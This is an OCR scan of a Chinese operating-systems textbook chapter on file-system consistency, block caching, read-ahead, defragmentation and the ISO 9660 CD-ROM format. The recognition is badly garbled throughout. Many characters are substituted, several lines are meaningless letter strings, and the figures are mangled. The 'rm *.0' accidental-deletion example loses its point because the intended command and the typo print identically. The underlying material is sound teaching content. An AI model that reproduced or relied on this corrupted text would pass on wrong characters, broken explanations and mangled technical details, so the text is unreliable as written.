并 释放 其 全 部 块 。 这 会 导致 其 中 一 个 目录 指向 一 未 使 用 的 i 和 点 ， 而 很 
有 可 能 其 块 马 上 融 补 分 配给 其 他 文件 。 解 决 方法 同样 站 把 iT 点 中 连接 
计数 设 为 目录 项 的 实际 个 数值 。 


由 于 效率 上 的 考虑 ， 以 上 的 块 检查 和 目录 检查 经 常 被 集成 到 一 起 
(BUDO Tati) 。 当 然 也 有 一 些 其 他 检查 方法 。 例 如 ， 目 录 
征 有 了 明确 格式 的 ， 包 含有 ii 点 数目 和 ASCII 文 件 名 ， 如 果 有 茶 个 目录 的 i 
万 氮 编号 大 于 磁盘 中 让 总 的 实际 数目 ， 说 明 这 个 目 孙 被 破坏 了 。 


再 有 ， 每 个 ji 节点 都 有 一 个 访问 权限 项 。 一 些 访问 权限 起 合 法 的 ， 

但 是 很 怪异 ， 比 如 0007， 它 不 允许 文件 所 有 着 及 所 在 用 户 组 的 成 员 进 
行 访 问 ， 而 其 他 的 用 户 却 可 以 读 、 写 、 执 行 此 文件 。 在 这 类 情况 下 ， 

有 必要 报告 系统 已 经 设置 了 其 他 用 户 权 限 高 于 文件 所 有 者 权限 这 一 情 
况 。 拥 有 1000 多 个 目录 项 的 目 孙 也 很 可 疑 。 为 超级 用 户 所 拥有 ， 但 放 
在 用 户 目录 下 ， 且 设置 了 SETUID 位 的 文件 ， 可 能 也 有 安全 问题 ， 因 为 
任何 用 户 执行 这 类 文件 都 需要 超级 用 户 的 权限 。 可 以 列 出 一 长 串 特 殊 
的 情况 ， 尽 管 这 些 情况 合法 ， 但 报告 给 用 户 却 是 有 必要 的 。 


以 上 讨论 了 防止 因 系 统 朋 省 而 破坏 用 户 文 件 的 问题 ， 某 一 些 文件 
系统 也 防止 用 户 目 吴 的 误 操 作 。 如 采用 户 想 输入 


rm *.0 


删除 全 部 以 .o 结 尾 的 文件 (编译 器 生成 的 目标 文件 ) ， 但 不 幸 键 入 


rm *.0 


(注意 ， 星 号 后 面 有 一 空格 ) ， 则 mm 命令 会 删除 全 部 当前 目录 中 
的 文件 ， 然 后 报告 说 找 不 到 文件 .0。 在 MS-DOS 和 一 些 其 他 系统 中 ， 文 
件 的 删除 仅仅 是 在 对 应 目录 或 节点 上 设置 某 一 位 ， 表 示 文件 被 删除 ， 
并 没有 把 磁盘 块 返回 到 空闲 表 中 ， 直 到 确实 需要 时 才 这 样 做 。 所 以 ， 
如 果 用 户 立 即 发 现 了 操作 错误 ， 可 以 运行 特定 的 一 个 撤销 删除 ”( 即 
恢复 ) 实用 程序 恢复 被 删除 的 文件 。 在 Windows 中 ， 删 除 的 文件 被 转移 
到 回收 站 目录 中 (一 个 特别 的 目录 ) ， 稍 后 若 需要 ， 可 以 从 那里 还 原 
文件 。 当 然 ， 除 非 文件 确实 从 回收 站 目录 中 删除 ， 否 则 不 会 释放 空 
间 。 


4.4.4 文件 系统 性 能 


访问 磁盘 比 访问 内 存 慢 得 多 。 读 内 存 中 一 个 32 位 字 大 概要 10ns 。 
从 硬盘 上 读 的 速度 大 约 超过 100MB/s， 对 32 位 字 来 说 ， 大 约 要 慢 4 倍 ， 
还 要 加 上 5 一 10ms 寻 道 时 间 ， 并 等 待 所 需 的 耐 面 抵达 磁头 下 。 如 果 只 需 
要 一 个 字 ， 内 存 访问 则 比 磁盘 访问 快 百 万 数量 级 。 考 虑 到 访问 时 间 的 
这 个 差异 ， 许 多 文件 系统 采用 了 各 种 优化 措施 以 改善 性 能 。 本 节 我 们 
将 介绍 其 中 三 种 方法 。 


1. 高 速 缓存 


最 常用 的 减少 磁盘 访问 次 数 技术 是 块 高 速 缓存 (block cache) 或 者 
缓冲 区 高 速 缓存 (buffer cache) 。 在 本 书 中 ， 高 速 缓存 指 的 是 一 系列 
的 块 ， 它 们 在 逻辑 上 属于 磁盘 ， 但 实际 上 基于 性 能 的 考虑 被 保存 在 内 
APRS 


管理 高 速 缓存 有 不 同 的 算法 ， 和 常用 的 算法 是 : 检查 全 部 的 读 请 
求 ， 查 看 在 高 速 缓存 中 是 否 有 所 需要 的 块 。 如 采 存 在 ， 可 执行 读 操作 
而 无 须 访问 磁盘 。 如 采 该 块 不 在 高 速 缓 存 中 ， 首 先 要 把 它 读 到 高 速 绥 
存 ， 再 复制 到 所 需 地 方 。 之 后 ， 对 同一 个 块 的 请 求 都 通过 高 速 缓存 完 
Bio 


高 速 缓 存 的 操作 如 图 4-28 所 示 。 由 于 在 高 速 缓存 中 有 许多 块 (通常 
有 上 千 块 ) ， 所 以 需要 有 某 种 方法 快速 确定 所 需要 的 块 是 否 存在 。 稼 
用 方法 是 将 设备 和 伍 副 地 址 进行 艇 列 操作 ， 然 后 ， 在 散 列 表 中 得 找 结 
果 。 具 有 相同 散 列 值 的 块 在 一 个 链表 中 连接 在 一 起 ， 这 样 束 可 以 沿 着 
冲突 链 查 找 其 他 块 。 


散 列表 HW tig LRU) 后 端 (MRU) 
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图 4-28 缓冲 区 高 速 缓存 数据 结构 


如 有 果 高 速 缓存 已 满 ， 则 需要 调 入 者 的 块 ， 因 此 ， 要 把 原来 的 某 一 
块 调 出 高 速 缓存 《如果 要 调 出 的 块 在 上 次 调 入 以 后 修改 过 ， 则 要 把 它 
写 回 磁盘 ) 。 这 种 情况 与 分 页 非常 相似 ， 所 有 常用 的 页 面 置换 算法 在 
第 3 章 中 已 经 介绍 ， 例 如 FIFO 算 法 、 第 二 次 机 会 算法 、LRU 算 法 等 ， 它 
们 都 适用 于 高 速 缓存 。 与 分 页 相 比 ， 高 速 缓存 的 好 处 在 于 对 高 速 缓存 
的 引用 不 很 频繁 ， 所 以 按 精确 的 LRU 顺 序 在 链表 中 记录 全 部 的 块 是 可 
FTES 


FEA4-28F A GE, PRS BONA P AER EES Ib, APA 
链表 把 所 有 的 块 按照 使 用 时 间 的 先后 次 序 链 接 起 来 ， 近 来 使 用 最 少 的 
块 在 该 链表 的 前 问 ， 而 近来 使 用 最 多 的 块 在 该 链表 的 后 问 。 当 引用 汞 
个 块 时 ， 该 块 可 以 从 双向 链表 中 移 走 ， 并 放置 到 该 表 的 尾部 去 。 用 这 
种 方法 ， 可 以 维护 一 种 准确 的 LRU 顺 序 。 


但 是 ， 这 又 带 来 了 意 想不到 的 难题 。 现 在 存在 一 种 情形 ， 使 我 们 
有 可 能 获得 精确 的 LRU， 但 是 碰巧 该 LRU 却 又 不 符合 要 求 。 这 个 问题 
与 前 一 廊 讨 论 的 系统 崩溃 和 文件 一 致 性 有 关 。 如 果 一 个 关键 块 比如 i 
TRAR) 读 进 了 高 速 缓 存 并 做 过 修改 ， 但 是 没有 写 回 磁盘 ， 这 时 ， 系 
统 朋 演 会 导致 文件 系统 的 不 一 致 。 如 果 把 i 亨 点 块 放 在 LRU 链 的 尾部 ， 
在 它 到 达 链 首 并 写 回 磁盘 前 ， 有 可 能 需要 相当 长 的 一 段 时 间 。 


rani) 


ESk, Fe HER, MTR, W n Be CE AY TR A 5 | PAIK o 
于 这 些 考 虑 需要 修改 LRU 方 案 ， 并 应 注意 如 下 两 点 : 


bit 


1) 这 一 块 是 否 不 久 后 会 再 次 使 用 ? 

2) 这 一 块 是 否 关系 到 文件 系统 的 一 致 性 ? 

考虑 以 上 两 个 问题 时 ， 可 将 块 分 为 i 点 块 、 间 接 块 、 目 永 块 、 满 
数据 块 、 部 分 数据 块 等 几 类 。 把 有 可 能 最 近 不 再 需要 的 块 放 在 LRU 链 


表 的 前 部 ， 而 不 是 LRU 链 表 的 后 端 ， 于 是 它们 所 占用 的 绥 冲 区 可 以 很 
快 被 重用 。 对 很 快 就 可 能 再 次 使 用 的 块 ， 比 如 正在 写 入 的 部 分 满 数 据 


块 ， 可 放 在 链表 的 尾部 ， 这 样 它们 能 在 高 速 缓存 中 保存 较 长 的 一 段 时 
间 。 


第 二 个 问题 独立 于 前 一 个 问题 。 如 有 果 关 系 到 文件 系统 一 致 性 〈 除 
数据 块 之 外 ， 其 他 块 基本 上 都 是 这 样 ) 的 某 块 被 修改 ， 都 应 立即 将 该 
块 写 回 磁盘 ， 不 管 它 是 否 被 放 在 LRU 链 表 尾 部 。 将 关键 块 快速 写 回 磁 
盘 ， 将 大 大 减少 在 计算 机 毅 总 后 文件 系统 被 破坏 的 可 能 性 。 用 户 的 文 
件 朋 各 了 ， 该 用 户 会 不 高 兴 ， 但 是 如 果 整 个 文件 系统 都 丢失 了 ， 那 么 
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尽管 用 这 类 方法 可 以 保证 文件 系统 一 致 性 不 受到 破坏 ， 但 我 们 仍 
然 不 布 望 数据 块 在 高 速 缓存 中 放 很 信之 后 才 写 入 磁盘 。 设 想 某 人 正在 
用 个 人 计算 机 编写 一 本 书 。 尽 管 作者 让 编辑 程序 将 正在 编辑 的 文件 定 
期 写 回 磁 副 ， 所 有 的 内 容 只 存在 高 速 缓存 中 而 不 在 磁 副 上 的 可 能 性 仍 
然 非 常 大。 如 采 这 时 系统 朋 误 ， 文 件 系统 的 结构 并 不 会 被 破坏 ， 但 他 
一 整 天 的 工作 束 会 丢失 。 


即使 只 发 生 几 次 这 类 情况 ， 也 会 让 人 感到 不 愉快 。 系 统 采 用 两 种 
方法 解决 这 一 问题 。 在 UNIX 系 统 中 有 一 个 系统 调用 sync， 它 强制 性 地 
把 全 部 修改 过 的 块 立 即 写 回 磁盘 。 系 统 启动 时 ， 在 后 台 运 行 一 个 通常 
名 为 update 的 程序 ， 它 在 无 限 循 环 中 不 断 执行 sync 调 用 ， 每 两 次 调用 之 
间 休 眠 30s。 于 是 ， 系 统 即 使 月 并 ， 也 不 会 丢失 超过 30 秒 的 工作 。 


虽然 目前 Windows 有 一 个 等 价 于 sync 的 系统 调用 一 一 
FlushFileBuffers， 不 过 过 去 没有 。 相 反 ，Windows 采 用 一 个 在 某 种 程度 
上 比 UNIX 方 式 更 好 (有 时 更 坏 ) 的 策略 。 其 做 法 是 ， 只 要 被 写 进 高 速 
缓存 ， 就 把 每 个 被 修改 的 块 写 进 磁盘 。 将 缓存 中 所 有 被 修改 的 块 立即 
写 回 人 磁盘 称 为 通 写 高 速 缓 存 (write-through cache) 。 同 非 通 写 高 速 缓 
存 相 比 ， 通 写 高 速 缓存 需要 更 多 的 磁盘 IO 。 


知 某 程序 要 写 满 1KB 的 块 ， 每 次 写 一 个 字符 ， 这 时 可 以 看 到 这 两 
种 方法 的 区 别 。UNIX 在 高 速 缓存 中 保存 全 部 字符 ， 并 把 这 个 块 每 30 秒 
写 回 磁盘 一 次 ， 或 者 当 从 高 速 缓存 删除 这 一 块 时 ， 写 回 磁 盘 。 在 通 写 
高 速 缓存 里 ， 每 写 入 一 字符 就 要 访问 一 次 磁盘 。 当 然 ， 多 数 程序 有 内 
部 缓冲 ， 通 常情 况 下 ， 在 每 次 执行 write 系统 调用 时 并 不 是 只 写 入 一 个 
字符 ， 而 是 写 入 一 行 或 更 大 的 单位 。 


采用 这 两 种 不 同 的 高 速 缓 存 策略 的 结果 是 ， 在 UNIX 系 统 中 ， 若 不 
调用 sync 就 移动 ( 软 ) 磁盘 ， 往 往 会 导致 数据 丢失 ， 在 被 毁坏 的 文件 系 
统 中 也 经 常 如 此 。 而 在 通 写 高 速 缓存 中 ， 就 不 会 出 现 这 类 情况 。 选 择 
不 同 策略 的 原因 是 ， 在 UNIX 开 发 环境 中 ， 全 部 磁盘 都 是 硬盘 ， 不 可 移 
动 。 而 第 一 代 Windows 文 件 源 自 MS-DOS， 是 从 软盘 世界 中 发 展 起 来 
的 。 由 于 UNIX 方 案 有 更 高 的 效率 它 成 为 当然 的 选择 (但 可 靠 性 更 
7) ， 随 着 硬盘 成 为 标准 ， 它 目前 也 用 在 Windows 的 磁 副 上 “。 但 是 ， 
NTFS 使 用 其 他 方法 (日 志 ) 改善 其 可 靠 性 ， 这 在 前 面 已 经 讨论 过 。 
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内 存 映射 文件 的 时 候 很 吸引 人 。 如 末 一 个 文件 被 映射 到 内 存 上 ， 则 它 
其 中 的 一 些 页 束 会 在 内 存 中 ， 因 为 它们 被 要 求 按 页 进入 。 这 些 页 面 与 
在 高 速 缓 存 中 的 文件 块 几乎 没有 不 同 。 在 这 种 情况 下 ， 它 们 能 被 以 同 
样 的 方式 来 对 每 ， 也 避 ® 是 说 ， 用 一 个 缓存 来 同时 存储 文件 块 与 页 。 


2. 块 提前 读 


第 二 个 明显 提高 文件 系统 性 能 的 技术 是 : 在 需要 用 到 块 之 前 ， 试 
图 提前 将 其 写 入 高 速 缓存 ， 从 而 提高 命中 率 。 特 别 地 ， 许 多 文件 都 是 
顺序 读 的 。 如 果 请 求 文件 系统 在 某 个 文件 中 生成 块 k， 文 件 系统 执行 相 
关 操 作 且 在 完成 之 后 ， 会 在 用 户 不 察觉 的 情形 下 检查 高 速 缓存 ， 以 便 
确定 块 k+1 是 否 已 经 在 高 速 缓存 。 如 果 还 不 在 ， 文 件 系统 会 为 块 kr+1 安 
排 一 个 预 恋 ， 因 为 文件 系统 希望 在 需要 用 到 该 块 时 ， 它 已 经 在 高 速 绥 
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当然 ， 块 提前 读 党 略 只 适用 于 顺序 读 取 的 文件 。 对 随机 存 取 文 
件 ， 提 前 读 丝 曼 不 起 作用 。 相 反 ， 它 还 会 帮 倒 忙 ， 因 为 读 取 无 用 的 块 
以 及 从 高 速 缓存 中 删除 潜在 有 用 的 块 将 会 占用 固定 的 磁盘 带宽 《如果 
有 “ 脏 ? 块 的 话 ， 还 需要 将 它们 写 回 磁 副 ， 这 就 占用 了 更 多 的 磁 强 带 
i) 。 那 么 提前 读 策略 是 否 值得 采用 呢 ? 文件 系统 通过 跟踪 每 一 个 打 
开 文 件 的 访问 方式 来 确定 这 一 点 。 例 如 ， 可 以 使 用 与 文件 相关 联 的 茶 
个 位 协助 跟 踩 该 文件 到 底 是 “顺序 存 取 方 式 ” 还 是 “随机 存 取 方式 *。 在 最 


初 不 能 确定 文件 属于 哪 种 存 取 方 式 时 ， 先 将 该 位 设置 成 顺序 存 取 方 
式 。 但 是 ， 查 找 一 完成 ， 就 将 该 位 消除。 如果 再 次 发 生 顺 序 读 取 ， 就 
再 次 设置 该 位 。 这 样 ， 文 件 系统 可 以 通过 合理 的 猜测 ， 确 定 是 否 应 该 
采取 提前 读 的 策略 。 即 便 弄 钳 了 一 次 也 不 会 产生 严重 后 果 ， 不 过 是 少 
费 一 人 小段 磁盘 的 市 宽 雪 了 。 
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高 速 缓存 和 块 提 前 读 并 不 是 提高 文件 系统 性 能 的 惟一 方法 。 必 一 
种 重要 技术 是 把 有 可 能 顺序 存 取 的 块 放 在 一 起 ， 当 然 最 好 是 在 同一 个 
柱 面 上 ， 从 而 减少 磁 副 臂 的 移动 次 数 。 当 写 一 个 输出 文件 时 ， 文 件 系 
统 丈 必 须 按照 要 求 一 次 一 次 地 分 配 磁 玛 块 。 如 采用 位 图 来 记录 至 朵 
块 ， 并 且 整 个 位 网 在 内 存 中 ， 那 么 选择 与 前 一 块 最 近 的 空闲 块 是 很 容 
易 的 。 如 东 用 罕 闲 表 ， 并 且 链 表 的 一 部 分 存在 傍 盘 上 ， 要 分 配 紧邻 着 
的 空间 块 束 困 难得 多 。 


不 过 ， 即 使 采用 空 几 表 ， 也 可 以 采用 块 簇 搁 术 。 这 里 用 到 一 个 小 
技巧 ， 即 不 用 块 而 用 连续 块 族 来 跟 路 人 磁盘 存储 区 。 如 末 一 个 届 区 有 512 
个 字 节 ， 有 可 能 系统 采用 1KB 的 块 (2K) ， 但 却 按 每 2 块 《4 个 局 
X) 一 个 单位 来 分 配 磁盘 存储 区 。 这 和 2KB 的 磁盘 块 并 不 相同 ， 因 为 
在 高 速 缓存 中 它 依然 使 用 1KB 的 块 ， 磁 弄 与 内 存 数 据 之 间 传 送 也 是 以 
1KB 为 单位 进行 ， 但 在 一 个 空 闪 的 系统 上 顺序 读 取 文件 ， 寻 道 的 次 数 
可 以 减少 一 半 ， 从 而 使 文件 系统 的 性 能 大 大 改善 。 寿 考虑 旋转 定位 则 


可 以 得 到 这 类 方案 的 变 体 。 在 分 配 块 时 ， 系 统 尽 量 把 一 个 文件 中 的 连 
续 块 存放 在 同一 柱 面 上 。 


在 使 用 i 让 点 或 任何 类 似 i 市 点 的 系统 中 ， 男 一 个 性 能 瓶 贷 是 ， 读 取 
一 个 很 短 的 文件 也 需要 两 次 磁盘 访问 : 一 次 是 访问 节操， 男 一 次 是 访 
问 块 。 通 常情 况 下 ，i 节 点 的 放置 如 图 4-29a 所 示 。 其 中 ， 全 部 i 市 点 都 放 
在 靠近 磁盘 开始 位 置 ， 所 以 i 节点 和 它 指向 的 块 之 间 的 平均 距离 是 柱 面 
数 的 一 半 ， 这 将 需要 较 长 的 寻 道 时 间 。 


磁盘 被 划分 为 柱 面 组 ， 
每 组 有 自己 的 i 节 点 
xo 


i AF feu 
人 磁盘 开始 位 置 
2 eae > 


a) b) 


Al 4-29 _ air 点 放 在 磁盘 开 始 位 置 ;， b) 磁 盘 分 为 柱 面 组 ， 每 组 有 目 己 
的 块 和 i 市 后 


一 个 简单 的 改进 方法 是 ， 在 磁盘 中 部 而 不 是 开始 处 存放 节点， 此 
时 ， 在 i 玉 点 和 第 一 块 之 间 的 平均 寻 道 时 间 诚 为 原来 的 一 半 。 另 一 种 做 
法 是 ， 将 位 僵 分 成 多 个 柱 面 组 ， 每 个 往 面 组 有 目 己 的 i 让 点、 数据 块 和 


空间 表 (McKusick A, 1984) ， 见 图 4-29b。 在 文件 创建 时 ， 可 选取 
任 一 节点， 但 首先 在 该 i 节点 所 在 的 柱 面 组 上 查找 块 。 如 果 在 该 柱 面 组 
中 没有 空闲 的 块 ， 就 选用 与 之 相 邻 的 柱 面 组 的 一 个 块 。 


4.4.5 Tidak RE EE 
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除 ， 于 是 人 磁盘 会 产生 很 多 碎片 ， 文 件 与 空 六 到 处 都 是 。 结 采 是 ， 当 创 
建 一 个 痢 文 件 时 ， 它 使 用 的 块 会 散布 在 整个 磁盘 上 ， 造 成 性 能 的 降 
低 。 


磁盘 性 能 可 以 通过 如 下 方式 恢复 ， 移动 文件 使 它们 相 邻 ， 并 把 所 
有 的 (至 少 是 大 部 分 的 ) 空闲 空间 放 在 一 个 或 多 个 大 的 连续 的 区 域 
内 。Windows 有 一 个 程序 defrag 束 是 从 事 这 个 工作 的 。Windows 的 用 户 
应 该 定期 使 用 它 。 


人 磁盘 碎片 整理 程序 会 在 一 个 在 分 区 末 闻 的 连续 区 域内 有 适量 空间 
空间 的 文件 系统 上 很 好 地 运行 。 这 段 空 间 会 允许 磁 强 碎片 整理 程序 选 
择 在 分 区 开始 端的 雁 所 文件， 并 复制 它们 所 有 的 块 放 到 空闲 空间 内 。 
这 个 动作 在 位 僵 开 始 处 释放 出 一 个 连续 的 块 空 间 ， 这 样 原始 或 其 他 的 
文件 可 以 在 其 中 相 邻 地 存放 。 这 个 过 程 可 以 在 下 一 大 块 的 磁 玛 空间 上 
重复 ， 并 继续 下 去 。 


有 些 文 件 不 能 被 移动 ， 包 括 页 文件 、 体 眼 文 件 以 及 日 志 ， 因 为 移 
动 这 些 文件 所 需 的 管理 成 本 要 大 于 移动 它们 的 价值 。 在 一 些 系统 中 ， 
这 些 文件 是 固定 大 小 的 连续 的 区 域 ， 因 此 它们 不 需要 进行 伴 片 整理 。 
这 类 文件 缺乏 灵活 性 会 造成 一 些 问题 ， 一 种 情况 是 ， 它 们 恰好 在 分 区 
的 末端 附近 并 且 用 户 想 减 小 分 区 的 大 小 。 解 决 这 种 问题 的 惟一 的 方法 
征 把 它们 一 起 删除 ， 改 变 分 区 的 大 小 ， 然 后 再 重新 建立 它们 。 


Linux 文 件 系统 (特别 是 ext2 和 ext3) 由 于 其 选择 磁盘 块 的 方式 ， 
在 人 磁盘 雄 片 整理 上 一 般 不 会 遭受 像 Windows 那 样 的 困难 ， 因 此 很 少 需 
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AS 文件 系统 实例 


在 这 一 厄 ， 我 们 将 讨论 文件 系统 的 几 个 实例 ， 包 括 从 相对 简单 的 
文件 系统 到 十 分 复杂 的 文件 系统 。 现 代 流 行 的 UNIX 文 件 系 统 和 
Windows Vista 目 带 文 件 系 统 在 本 书 的 第 10 章 和 第 11 章 有 详细 介绍 ， 在 
此 就 不 再 讨论 了 。 但 是 我 们 有 必要 来 看 看 这 些 文件 系统 的 前 身 。 


4.5.1 CD-ROM 文 件 系统 


作为 第 一 个 文件 系统 实例 ， 让 我 们 来 看 看 用 于 CD-ROM 的 文件 系 
统 。 因 为 这 些 文 件 系统 是 为 一 次 性 写 介质 设计 的 ， 所 以 非常 简单 。 例 
如 ， 该 文件 系统 不 需要 记录 空 几 块 ， 这 是 因为 一 旦 光 副 生产 出 来 后 ， 
CD-ROM 上 的 文件 就 不 能 被 删除 或 者 创建 了 。 下 面 我 们 来 看 看 主要 的 
CD-ROM 文 件 系统 类 型 以 及 对 这 个 文件 系统 的 两 种 扩展 。 


在 CD-ROM 出 现 一 些 年 后 ， 引 进 了 CD-R (可 记录 CD) ° MCD- 
ROM，CD-R 可 以 在 初次 刻录 之 后 加 文件 ， 但 只 能 简单 地 加 在 CD-R 的 
最 后 面 。 文 件 不 能 删除 (尽管 可 以 更 新 目录 来 隐藏 已 存在 的 文件 ) 。 
因而 对 于 这 种 “只 能 添加 ”的 文件 系统 ， 其 基本 的 性 质 不 会 改变 。 特 别 
地 ， 所 有 的 空间 空间 放 在 了 CD 末端 连续 的 一 大 块 内 。 


1.ISO 9660 文 件 系统 


最 普遍 的 一 种 CD-ROM 文 件 系统 的 标准 是 1988 年 被 采纳 的 名 为 ISO 
9660 的 国际 标准 。 实 际 上 现在 市 场 上 的 所 有 CD-ROM 都 支持 这 个 标 
准 ， 有 的 则 带 有 一 些 扩展 (下面 会 对 此 进行 讨论 ; 。 这 个 标准 的 一 个 
目标 融 是 使 CD-ROM 独 立 于 机 器 所 采用 的 字 节 顺序 和 使 用 的 操作 系 
统 ， 即 在 所 有 的 机 器 上 都 是 可 读 的 。 因 此 ， 在 该 文件 系统 上 加 上 了 一 
些 限 制 ， 使 得 最 弱 的 操作 系统 (如 MS-DOS) 也 能 读 取 该 文件 系统 。 


CD-ROM 没 有 和 磁盘 一 样 的 同心 柱 面 ， 而 是 治 一 个 连续 的 蝶 旋 线 
来 顺序 存储 信息 (当然 ， 跨 越 紧 旋 线 查找 也 是 可 能 的 ) 。 螺 旋 上 的 位 
序列 被 划分 成 大 小 为 2352 字 节 的 逻辑 块 (也 称 为 逻辑 悄 区 ) 。 这 些 块 
有 的 用 来 进行 引导 ， 有 的 用 来 进行 错误 纠正 或 者 其 他 一 些 用 途 。 每 个 
逻辑 块 的 有 效 部 分 是 2048 字 世 。 当 用 于 存放 音乐 时 ，CD 中 有 导入 部 
分 、 导 出 部 分 以 及 轨道 间 的 间 际 ， 但 是 用 于 存储 数据 的 CD-ROM 则 没 
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换 系 数 1 秒 =75 块 ， 则 可 以 转换 得 到 相应 的 线性 块 号 。 


ISO 9660 文 持 的 CD-ROM 集 可 以 有 多 达 21 -1 个 CD。 每 个 单独 的 
CD-ROM 还 可 分 为 多 个 逻辑 卷 (分 区 ) 。 下 面 我 们 重点 考虑 单个 没有 
分 区 CD-ROM 时 的 ISO 9660 ° 


每 个 CD-ROM 有 16 块 作为 开始 ， 这 16 块 的 用 途 在 ISO 9660 标 准 中 没 
有 定义 。CD-ROM 制 造 商 可 以 在 这 一 区 域 里 放 入 引导 程序 ， 使 计算 机 
能 够 从 CD-ROM3| 导 ， 或 者 用 于 其 他 目的 。 接 下 来 的 一 块 存放 基本 卷 


描述 符 (primary volume descriptor) ， 基 本 卷 描述 符 包 含 了 CD-ROM 的 
些 基 本 信息 。 这 些 信息 包括 系统 标识 符 〈32 字 节 ) 、 卷 标识 符 (32 
字 节 ) 、 发 布 标识 符 (128 字 节 ) 和 数据 预备 标识 符 (128 字 节 ) 。 制 
造 商 可 以 在 上 面 的 几 个 域 中 填 入 需要 的 信息 ， 但 是 为 了 跨 平台 的 兼容 
性 ， 不 能 使 用 大 写字 母 、 数 字 以 及 很 少 一 部 分 标点 符号 。 


基本 卷 描 述 符 还 包含 了 三 个 文件 的 名 字 ， 这 三 个 文件 分 别 用 来 存 
储 概 述 、 版 权 声明 和 文献 信息 。 除 此 之 外 ， 还 包含 有 一 些 关 键 数字 信 
息 ， 例 如 逻辑 块 的 大 小 (通常 为 2048， 但 是 在 某 些 情 况 下 可 以 是 
4096、8192 或 者 更 大 ) 、CD-ROM 所 包含 的 块 数目 以 及 CD-ROM 的 创 
建 日 期 和 过 期 日 期 。 基 本 卷 揪 述 行 也 包含 了 根 目录 的 目录 表 项 ， 说 明 
根 目录 在 CD-ROM 的 位 置 ( 即 从 哪 一 块 开始 ) 。 从 这 个 根 目 录 ， 系 统 
就 能 找到 其 他 文件 所 在 的 位 置 。 


除 基本 卷 措 述 符 之 外 ，CD-ROM 还 包含 有 一 个 补充 卷 撒 述 符 
(supplementary volume descriptor) 。 它 和 基本 卷 描述 符 包 含 类 似 的 信 
时， 在 这 里 不 再 详细 讨论 。 


根 目 录 和 所 有 的 其 他 目录 包含 可 变数 目的 目录 项 ， 目 录 中 的 最 后 
一 个 目录 项 有 一 位 用 于 标记 该 目录 项 是 目录 中 的 最 后 一 个 。 目 录 项 本 
身 也 是 长 度 可 变 的 。 每 一 个 目录 项 由 10 到 12 个 域 构成 ， 其 中 一 些 域 是 
ASCII 域 ， 另 外 一 些 是 二 进 制 数字 域 。 二 进 制 域 梓 编码 两 次 ， 一 个 用 于 
低地 址 结尾 格式 〈 例 如 在 Pentium 上 所 用 的 ) ， 一 个 用 于 高 地 址 结尾 格 


式 (例如 在 SPARC 上 所 用 的 ) 。 因 此 ， 一 个 16 位 的 数字 需要 4 个 字 节 ， 


一 个 32 位 的 数字 需要 8 个 字 节 。 


这 样 见 余 编 码 的 目的 主要 是 为 了 能 在 标准 发 展 的 同时 照顾 到 各 个 
方面 的 利益 。 如 果 该 标准 仅 规 定 低地 址 结尾 ， 那 么 在 产品 中 使 用 高 地 
址 结尾 的 厂家 束 会 和 觉得 目 己 受到 歧视 ， 束 不 会 接受 这 个 标准 。 所 以 我 
们 可 以 准确 地 用 元 余 的 字 节 /小 时 数 来 衡量 一 张 CD-ROM 的 情感 因素 。 


ISO 9660 目 录 项 的 格式 如 图 4-30 所 示 。 因 为 目录 项 是 长 度 可 变 的 ， 
所 以 ， 第 一 个 域 就 说 明 这 一 项 的 长 度 。 这 一 字 闻 被 定义 为 高 位 在 左 ， 
以 避免 混 消 。 


示 志 YA or 
eu 扩展 属性 记录 长 度 标志 位 


目录 项 长 度 分 隔 


图 430 ISO 9660 的 目录 项 


目 孙 项 可 能 包含 有 扩展 属性 。 如 宁 使 用 了 这 个 特性 ， 则 第 二 个 字 
了 就 说 明 扩 展 属 性 的 长 度 。 


接 下 来 是 文件 本 号 的 起 始 块 。 文 件 是 以 连续 块 的 方式 存储 的 ， 所 
以 一 个 文件 的 位 置 完全 可 以 由 起 始 块 的 位 置 和 大 小 来 确定 。 起 始 块 的 
下 一 个 域 陀 是 文件 大 小 。 
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别 表 示 年 、 月 、 日 、 小 时 、 分 钟 、 秒 和 时 区 。 年 份 是 从 1900 年 开始 计 
数 的 ， 这 意味 着 CD-ROM 将 会 遇 到 2156 年 问题 ， 因 为 在 2155 年 之 后 将 
会 是 1900 年 。 如 果 定 义 初 始 的 日 期 为 1988 年 (标准 通过 的 那 一 年 ) 的 
话 ， 那 么 这 个 问题 就 可 以 推迟 88 年 产生 ， 也 就 是 2244 年 。 


标志 位 域 包含 一 些 其 他 的 位 ， 包 括 一 个 用 来 在 打开 目 台 时 隐藏 目 
录 项 (来 自 MS-DOS 的 特性 ) 的 标志 位 ， 一 个 用 以 区 分 该 项 是 文件 还 是 
目 孙 的 标志 位 ， 一 个 用 以 标志 是 否 使 用 扩展 属性 的 标志 位 ， 以 及 一 个 
用 来 标志 该 项 是 否 为 目录 中 最 后 一 项 的 标志 位 。 其 他 一 些 标 志 位 也 在 
这 个 域 中 ， 但 是 在 此 我 们 不 再 讨论 。 下 一 个 域 说 明了 在 ISO 9660 的 最 简 
版 本 中 和 是否 使 用 文件 分 隅 块 ， 我 们 也 不 做 讨论 。 


再 下 一 个 域 标明 了 该 文件 放 在 哪 一 个 CD-ROM 上 “。 一 个 CD-ROM 
的 目录 项 可 以 引用 在 同一 CD-ROM 集 中 的 另外 一 个 CD-ROM 上 的 文 
件 。 用 这 样 的 方法 就 可 以 在 第 一 张 CD-ROM 上 建立 一 个 主 目 录 ， 该 主 
目录 列 出 了 在 这 个 CD-ROM 集 合 中 的 其 他 所 有 CD-ROM 上 的 文件 。 


图 4-30 中 标 有 LL 的 域 给 出 了 文件 名 的 大 小 《以 字 节 为 单位 ) 。 之 后 
的 域 束 是 文件 名 本 映 。 一 个 文件 名 由 基本 名 、 一 个 态 、 扩 展 名 、 分 号 
和 二 进 制版 本 号 (1 或 2 个 字 节 ) 构成 。 基 本 名 和 扩展 名 可 以 使 用 大 写 
字母 、 数 子 0~9 和 和 下划线 。 茶 止 使 用 其 他 字符 以 保证 所 有 的 机 器 部 能 
处 理 这 个 文件 名 。 基 本 名 最 多 可 以 为 8 个 字符 ， 而 扩展 名 最 多 可 以 为 3 


个 字符 。 这 样 做 是 为 了 保证 能 和 MS-DOS 兼 容 。 只 要 文件 的 版 本 号 不 
同 ， 则 相同 的 文件 名 可 以 在 同一 个 目录 中 出 现 多 次 。 


最 后 两 个 域 不 是 必需 的 。 填 充 域 用 来 保证 每 一 个 目录 项 都 症 偶数 
个 字 节 ， 以 2 字 市 为 边界 对 齐 下 一 项 的 数字 域 。 如 果 和 需要 填充 的 话 ， 吕 
